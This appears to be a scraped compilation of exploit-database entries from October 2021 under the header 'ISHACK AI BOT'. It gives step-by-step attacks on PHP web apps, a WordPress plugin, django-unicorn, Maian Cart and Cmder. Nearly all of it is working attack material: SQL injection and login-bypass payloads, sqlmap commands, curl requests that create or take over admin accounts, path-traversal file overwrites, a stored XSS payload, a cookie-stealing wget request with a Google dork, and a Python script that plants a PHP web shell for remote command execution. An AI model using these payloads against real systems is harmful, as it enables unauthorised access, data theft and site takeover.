ISHACK AI BOT

# Title: IFSC Code Finder Project 1.0 - SQL injection (Unauthenticated) # Exploit Author: Yash Mahajan # Date: 2021-10-07 # Vendor Homepage: https://phpgurukul.com/ifsc-code-finder-project-using-php/ # Version: 1 # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=14478 # Tested On: Windows 10, XAMPP # Vulnerable Parameter: searchifsccode Steps to Reproduce: 1) Navigate to http://127.0.0.1/ifscfinder/ enter any number in search field and capture request in burpsuite. 2) Paste below request into burp repeater and also create a txt file and paste this request. Request: ======== POST /ifscfinder/search.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 79 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/ifscfinder/ Cookie: PHPSESSID=5877lg2kv4vm0n5sb8e1eb0d0k Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 searchifsccode=')+AND+(SELECT+3757+FROM+(SELECT(SLEEP(20)))lygy)--+fvnT&search= -------------------------------------------------------------------------------- 3) You will see a time delay of 20 Sec in response. 4) python sqlmap.py -r request.txt -p searchifsccode --dbs 5) We can retrieve all databases using above sqlmap command

# Exploit Title: Simple Online College Entrance Exam System 1.0 - SQLi Authentication Bypass # Date: 07.10.2021 # Exploit Author: Mevlüt Yılmaz # Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code # Version: 1.0 # Tested on: Windows 10, Kali Linux # Simple Online College Entrance Exam System v1.0 Login page can be bypassed with a simple SQLi to the username parameter. Steps To Reproduce: 1 - Go to the login page http://localhost/entrance_exam/admin/login.php 2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field. 3 - Click on "Login" button and you are logged in as administrator. PoC POST /entrance_exam/Actions.php?a=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 45 Origin: http://localhost Connection: close Referer: http://localhost/entrance_exam/admin/login.php Cookie: PHPSESSID=57upokqf37b2fjs4o5tc84cd8n username=admin'+or+'1'%3D'1&password=anything

# Exploit Title: Online Traffic Offense Management System 1.0 - Privilage escalation (Unauthenticated) # Date: 07/10/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: [email protected] # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html # Version: 1.0 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### Privilage escalation # All requests can be sent by both an authenticated and a non-authenticated user # The vulnerabilities in the application allow for: * Reading any PHP file from the server * Saving files to parent and child directories and overwriting files in server * Performing operations by an unauthenticated user with application administrator rights ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example 1 - Reading any PHP file from the server Example vuln scripts: http://localhost/traffic_offense/index.php?p= http://localhost/traffic_offense/admin/?page= # Request reading rrr.php file from other user in serwer GET /traffic_offense/index.php?p=../phpwcms2/rrr HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 10:09:35 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Connection: close [...] </br></br>Hacked file other user in serwer!</br></br> [...] ----------------------------------------------------------------------------------------------------------------------- ## Example 2 - Saving files to parent and child directories and overwriting files in server # Request to read file GET /traffic_offense/index.php HTTP/1.1 Host: localhost Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 10:30:56 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Set-Cookie: PHPSESSID=330s5p4flpokvjpl4nvfp4dj2t; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15095 <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Online Traffic Offense Management System - PHP</title> [...] ----------------------------------------------------------------------------------------------------------------------- # Request to overwrite file index.php in main directory webapp POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------329606699635951312463334027403 Content-Length: 1928 Origin: http://localhost Connection: close Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4 Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="id" 5/../../../index -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="license_id_no" GBN-1020061 -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="lastname" Blake -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="firstname" Claire -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="middlename" C -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="dob" 1992-10-12 -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="present_address" Sample Addss 123 -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="permanent_address" Sample Addess 123 -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="civil_status" Married -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="nationality" Filipino -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="contact" 09121789456 -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="license_type" Non-Professional -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="image_path" uploads/drivers/ -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="img"; filename="fuzzdb.php" Content-Type: image/png <?php echo "Hacked other client files in this hosting!"; ?> -----------------------------329606699635951312463334027403-- # New file have extention as this write filename="fuzzdb.php" # New file have name and locate 5/../../../index we can save file in other directory ;) # Line must start digit # We can rewrite config files ----------------------------------------------------------------------------------------------------------------------- # Respopnse HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 10:38:35 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"success"} ----------------------------------------------------------------------------------------------------------------------- # Request to read file index.php again GET /traffic_offense/index.php HTTP/1.1 Host: localhost Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 10:42:17 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Access-Control-Allow-Origin: * Content-Length: 42 Connection: close Content-Type: text/html; charset=UTF-8 Hacked other client files in this hosting! ----------------------------------------------------------------------------------------------------------------------- ## Example 4 - Performing operations by an unauthenticated user with application administrator rights # The application allows you to perform many operations without authorization, the application has no permission matrix. The entire application is vulnerable # Request adding new admin user to application by sending a request by an authorized user POST /traffic_offense/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685 Content-Length: 949 Origin: http://localhost Connection: close Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="id" 21 -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="firstname" hack -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="lastname" hack -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="username" hack -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="password" hack -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="type" 1 -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="img"; filename="aaa.php" Content-Type: application/octet-stream <?php phpinfo(); ?> -----------------------------210106920639395210803657370685-- ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 10:50:36 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Set-Cookie: PHPSESSID=2l1p4103dtj3j3vrod0t6rk6pn; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 1 # The request worked fine, log into the app using your hack account

# Exploit Title: django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS) # Date: 10/7/21 # Exploit Author: Raven Security Associates, Inc. (ravensecurity.net) # Software Link: https://pypi.org/project/django-unicorn/ # Version: <= 0.35.3 # CVE: CVE-2021-42053 django-unicorn <= 0.35.3 suffers from a stored XSS vulnerability by improperly escaping data from AJAX requests. Step 1: Go to www.django-unicorn.com/unicorn/message/todo Step 2: Enter an xss payload in the todo form (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet). POC: POST /unicorn/message/todo HTTP/2 Host: www.django-unicorn.com Cookie: csrftoken=EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z Content-Length: 258 Sec-Ch-Ua: "";Not A Brand"";v=""99"", ""Chromium"";v=""94"" Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Accept: application/json X-Requested-With: XMLHttpRequest X-Csrftoken: EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z Sec-Ch-Ua-Platform: ""Linux"" Origin: https://www.django-unicorn.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.django-unicorn.com/examples/todo Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 {""id"":""Q43GSmJh"",""data"":{""task"":"""",""tasks"":[]},""checksum"":""4ck2yTwX"",""actionQueue"":[{""type"":""syncInput"",""payload"":{""name"":""task"",""value"":""<img src=x onerror=alert(origin)>""}},{""type"":""callMethod"",""payload"":{""name"":""add""},""partial"":{}}],""epoch"":1633578678871} ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- HTTP/2 200 OK Date: Thu, 07 Oct 2021 03:51:18 GMT Content-Type: application/json X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin Via: 1.1 vegur Cf-Cache-Status: DYNAMIC Expect-Ct: max-age=604800, report-uri=""https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"" Report-To: {""endpoints"":[{""url"":""https:\/\/a.nel.cloudflare.com\/report\/v3?s=b4nQavto8LK9ru7JfhbNimKP71ZlMtduJTy6peHCwxDVWBH2Mkn0f7O%2FpWFy1FgPTd6Z6FmfkYUw5Izn59zN6kTQmjNjddiPWhWCWZWwOFiJf45ESQxuxr44UeDv3w51h1Ri6ESnNE5Y""}],""group"":""cf-nel"",""max_age"":604800} Nel: {""success_fraction"":0,""report_to"":""cf-nel"",""max_age"":604800} Server: cloudflare Cf-Ray: 69a42b973f6a6396-ORD Alt-Svc: h3="":443""; ma=86400, h3-29="":443""; ma=86400, h3-28="":443""; ma=86400, h3-27="":443""; ma=86400 {""id"": ""Q43GSmJh"", ""data"": {""tasks"": [""<img src=x onerror=alert(origin)>""]}, ""errors"": {}, ""checksum"": ""ZQn54Ct4"", ""dom"": ""<div unicorn:id=\""Q43GSmJh\"" unicorn:name=\""todo\"" unicorn:key=\""\"" unicorn:checksum=\""ZQn54Ct4\"">\n<form unicorn:submit.prevent=\""add\"">\n<input type=\""text\"" unicorn:model.lazy=\""task\"" placeholder=\""New task\"" id=\""task\""/>\n</form>\n<button unicorn:click=\""add\"">Add</button>\n<p>\n<ul>\n<li><img src=x onerror=alert(origin)></li>\n</ul>\n<button unicorn:click=\""$reset\"">Clear all tasks</button>\n</p>\n</div>\n"", ""return"": {""method"": ""add"", ""params"": [], ""value"": null}}" "ENDTEXT"

# Exploit title: Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated) # Date: 27.11.2020 19:35 # Tested on: Ubuntu 20.04 LTS # Exploit Author(s): DreyAnd, purpl3 # Software Link: https://www.maiancart.com/download.html # Vendor homepage: https://www.maianscriptworld.co.uk/ # Version: Maian Cart 3.8 # CVE: CVE-2021-32172 #!/usr/bin/python3 import argparse import requests from bs4 import BeautifulSoup import sys import json import time parser = argparse.ArgumentParser() parser.add_argument("host", help="Host to exploit (with http/https prefix)") parser.add_argument("dir", help="default=/ , starting directory of the maian-cart instance, sometimes is placed at /cart or /maiancart") args = parser.parse_args() #args host = sys.argv[1] directory = sys.argv[2] #CREATE THE FILE print("\033[95mCreating the file to write payload to...\n\033[00m", flush=True) time.sleep(1) try: r = requests.get(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=shell.php&target=l1_Lw") print(r.text) if "added" in r.text: print("\033[95mFile successfully created.\n\033[00m") else: print("\033[91mSome error occured.\033[00m") except (requests.exceptions.RequestException): print("\033[91mThere was a connection issue. Check if you're connected to wifi or if the host is correct\033[00m") #GET THE FILE ID time.sleep(1) file_response = r.text soup = BeautifulSoup(file_response,'html.parser') site_json=json.loads(soup.text) hash_id = [h.get('hash') for h in site_json['added']] file_id = str(hash_id).replace("['", "").replace("']", "") print("\033[95mGot the file id: ", "\033[91m", file_id , "\033[00m") print("\n") #WRITE TO THE FILE print("\033[95mWritting the payload to the file...\033[00m") print("\n") time.sleep(1) headers = { "Accept": "application/json, text/javascript, /; q=0.01", "Accept-Language" : "en-US,en;q=0.5", "Content-Type" : "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With" : "XMLHttpRequest", "Connection" : "keep-alive", "Pragma" : "no-cache", "Cache-Control" : "no-cache", } data = f"cmd=put&target={file_id}&content=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%20%3F%3E" try: write = requests.post(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder", headers=headers, data=data) print(write.text) except (requests.exceptions.RequestException): print("\033[91mThere was a connection issue. Check if you're connected to wifi or if the host is correct\033[00m") #EXECUTE THE PAYLOAD print("\033[95mExecuting the payload...\033[00m") print("\n") time.sleep(1) exec_host = f"{host}{directory}/product-downloads/shell.php" print(f"\033[92mGetting a shell. To stop it, press CTRL + C. Browser url: {host}{directory}/product-downloads/shell.php?cmd=\033[00m") time.sleep(2) while True: def main(): execute = str(input("$ ")) e = requests.get(f"{exec_host}?cmd={execute}") print(e.text) try: if __name__ == "__main__": main() except: exit = str(input("Do you really wish to exit? Y/N? ")) if exit == "Y" or exit =="y": print("\033[91mExit detected. Removing the shell...\033[00m") remove = requests.get(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=rm&targets%5B%5D={file_id}") print("\033[91m" , remove.text, "\033[00m") print("\033[91mBye!\033[00m") sys.exit(1) else: main()

# Exploit Title: WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated) # Google Dork: inurl:/plugins/pie-register/ # Date: 08.10.2021 # Exploit Author: Lotfi13-DZ # Vendor Homepage: https://wordpress.org/plugins/pie-register/ # Software Link: https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip # Version: <= 3.7.1.4 # Tested on: ubuntu Vulnerable arg: [user_id_social_site=1] <== will return the authentications cookies for user 1 (admin). Exploit: wget -q -S -O - http://localhost/ --post-data 'user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null' > /dev/null

# Exploit Title: Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation # Date: 07.10.2021 # Exploit Author: Amine ismail @aminei_ # Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code # Version: 1.0 # Tested on: Windows 10, Kali Linux # Unauthenticated admin creation Unauthenticated admin creation: Request: POST /entrance_exam/Actions.php?a=save_admin HTTP/1.1 Host: 127.0.0.1 Content-Length: 42 id=&fullname=admin2&username=admin2&type=1 PoC to create an admin user named exploitdb and password exploitdb: curl -d "id=&fullname=admin&username=exploitdb&type=1&password=916b5dbd201b469998d9b4a4c8bc4e08" -X POST 'http://127.0.0.1/entrance_exam/Actions.php?a=save_admin'

# Exploit Title: Simple Online College Entrance Exam System 1.0 - Account Takeover # Date: 07.10.2021 # Exploit Author: Amine ismail @aminei_ # Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code # Version: 1.0 # Tested on: Windows 10, Kali Linux # Unauthenticated password change leading to account takeover Explanation: By setting the parameter old_password as array, the MD5 function on it returns null, so md5($old_password) == $_SESSION['password'] since we have no session, thus bypassing the check, after that we can use SQLI and inject our custom data. Request: POST /entrance_exam/Actions.php?a=update_credentials HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 129 id=4&username=test',`password`='916b5dbd201b469998d9b4a4c8bc4e08'+WHERE+admin_id=4;%23&password=commented_out&old_password[]=test Vulnerable code in Actions.php: function update_credentials(){ extract($_POST); $data = ""; foreach($_POST as $k => $v){ if(!in_array($k,array('id','old_password')) && !empty($v)){ if(!empty($data)) $data .= ","; if($k == 'password') $v = md5($v); $data .= " `{$k}` = '{$v}' "; } } ... if(!empty($password) && md5($old_password) != $_SESSION['password']){ $resp['status'] = 'failed'; $resp['msg'] = "Old password is incorrect."; }else{ $sql = "UPDATE `admin_list` set {$data} where admin_id = '{$_SESSION['admin_id']}'"; @$save = $this->query($sql); PoC that changes the password and username of user 'admin' to 'exploitdb': curl -d "username=exploitdb',%60password%60='916b5dbd201b469998d9b4a4c8bc4e08' WHERE admin_id=1;%23&password=useless&old_password[]=useless" -X POST 'http://127.0.0.1/entrance_exam/Actions.php?a=update_credentials'

# Exploit Title: Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection # Date: 07.10.2021 # Exploit Author: Amine ismail @aminei_ # Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code # Version: 1.0 # Tested on: Windows 10, Kali Linux # Multiple SQL injections The following PoCs will leak the admin username and password: Unauthenticated: http://127.0.0.1/entrance_exam/take_exam.php?id=%27+UNION+SELECT+1,username||%27;%27||password,3,4,5,6,7+FROM+admin_list; Admin: http://127.0.0.1/entrance_exam/admin/view_enrollee.php?id=1'+UNION+SELECT+1,2,3,4,5,6,password,username,9,10,11,12,13,14,15+FROM+admin_list;

# Exploit Title: Online Enrollment Management System 1.0 - Authentication Bypass # Date: 07.10.2021 # Exploit Author: Amine ismail @aminei_ # Vendor Homepage: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html # Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html # Version: 1.0 # Tested on: Windows 10, Kali Linux # Admin panel authentication bypass Admin panel authentication can be bypassed due to a SQL injection in the login form: Request: POST /OnlineEnrolmentSystem/admin/login.php HTTP/1.1 Host: 127.0.0.1 Content-Length: 63 Cookie: PHPSESSID=jd2phsg2f7pvv2kfq3lgfkc98q user_email=admin'+OR+1=1+LIMIT+1;--+-&user_pass=admin&btnLogin= PoC: curl -d "user_email=admin' OR 1=1 LIMIT 1;--+-&user_pass=junk&btnLogin=" -X POST http://127.0.0.1/OnlineEnrolmentSystem/admin/login.php

# Exploit Title: Online Employees Work From Home Attendance System 1.0 - SQLi Authentication Bypass # Date: 08.10.2021 # Exploit Author: Merve Oral # Vendor Homepage: https://www.sourcecodester.com/php/14981/online-employees-work-home-attendance-system-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14981&title=Online+Employees+Work+From+Home+Attendance+System+in+PHP+and+SQLite+Free+Source+Code # Version: 1.0 # Tested on: Windows 10, Kali Linux # Online Employees Work From Home Attendance System/Logs in a Web App v1.0 Login page can be bypassed with a simple SQLi to the username parameter. Steps To Reproduce: 1 - Go to the login page http://localhost/audit_trail/login.php 2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field. 3 - Click on "Login" button and you are logged in as administrator. PoC POST /wfh_attendance/Actions.php?a=login HTTP/1.1 Host: merve User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 40 Origin: http://merve Connection: close Referer: http://merve/wfh_attendance/admin/login.php Cookie: PHPSESSID=55nnlgv0kg2qaki92o2s9vl5rq username=admin'+or+'1'%3D'1&password=any

# Exploit Title: Loan Management System 1.0 - SQLi Authentication Bypass # Date: 08.10.2021 # Exploit Author: Merve Oral # Vendor Homepage: https://www.sourcecodester.com/php/14471/loan-management-system-using-phpmysql-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14471&title=Loan+Management+System+using+PHP%2FMySQL+with+Source+Code # Version: 1.0 # Tested on: Windows 10, Kali Linux # Loan Management System Login page can be bypassed with a simple SQLi to the username parameter. Steps To Reproduce: 1 - Go to the login page http://localhost/audit_trail/login.php 2 - Enter the payload to username field as "admin' or '1'='1'#" without double-quotes and type anything to password field. 3 - Click on "Login" button and you are logged in as administrator. PoC POST /loan/ajax.php?action=login HTTP/1.1 Host: merve User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 44 Origin: http://merve Connection: close Referer: http://merve/loan/login.php Cookie: PHPSESSID=911fclrpoa87v9dsp9lh28ck0h username=admin'+or+'1'%3D'1'%23&password=any

# Exploit Title: Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC) # Date: 2021-10-07 # Exploit Author: Aryan Chehreghani # Vendor Homepage: https://cmder.net # Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip # Version: v1.3.18 # Tested on: Windows 10 # [About - Cmder Console Emulator] : #Cmder is a software package created over absence of usable console emulator on Windows. #It is based on ConEmu with major config overhaul, comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout. # [Security Issue] : #equires the execution of a .cmd file type and The created file enters the emulator ,That will trigger the buffer overflow condition. #E.g λ cmder.cmd # [POC] : PAYLOAD=chr(235) + "\\CMDER" PAYLOAD = PAYLOAD * 3000 with open("cmder.cmd", "w") as f: f.write(PAYLOAD)

# Exploit Title: Simple Payroll System 1.0 - SQLi Authentication Bypass # Date: 2021-10-09 # Exploit Author: Yash Mahajan # Vendor Homepage: https://www.sourcecodester.com/php/14974/simple-payroll-system-dynamic-tax-bracket-php-using-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple_payroll_0.zip # Version: 1.0 # Tested on: Windows 10 # Description: Simple Payroll System v1.0 Login page can be bypassed with a SQLi into the username parameter. Steps To Reproduce: 1 - Navigate to http://localhost/simple_payroll/admin/login.php 2 - Enter the payload into the username field as "' or 1=1-- " without double-quotes and type anything into the password field. 3 - Click on "Login" button and you are logged in as administrator. Proof Of Concept: POST /simple_payroll/Actions.php?a=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 37 Origin: http://localhost Connection: close Referer: http://localhost/simple_payroll/admin/login.php Cookie: PHPSESSID=ijad04l4pfb2oec6u2vmi4ll9p Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin username='+or+1%3D1--+&password=admin

# Title: Company's Recruitment Management System 1.0 - 'Multiple' SQL Injection (Unauthenticated) # Exploit Author: Yash Mahajan # Date: 2021-10-09 # Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html # Version: 1 # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip # Tested On: Windows 10, XAMPP # Vulnerable Parameters: "id" , "username" Steps to Reproduce: A) SQL Injection (Authentication Bypass) 1) Navigate to http://localhost/employment_application/admin/login.php 2) Enter the payload into the username field as "' or 1=1-- " without double-quotes and type anything into the password field. 3) Click on "Login" button and you are logged in as administrator. Request: ======== POST /employment_application/Actions.php?a=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 38 Origin: http://localhost Connection: close Referer: http://localhost/employment_application/admin/login.php Cookie: PHPSESSID=fk1gp1s7stu7kitjmhvjfakjqk Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin username='+or+1%3D1--+-&password=admin -------------------------------------------------------------------------------- B) 1) Vulnerable Parameter: "id" 2) Sqlmap Command to get retrieve tables from the database 3) python sqlmap.py -u "http://localhost/employment_application/?page=view_vacancy&id=1" --level=3 --risk=2 --banner --dbms=sqlite --tables

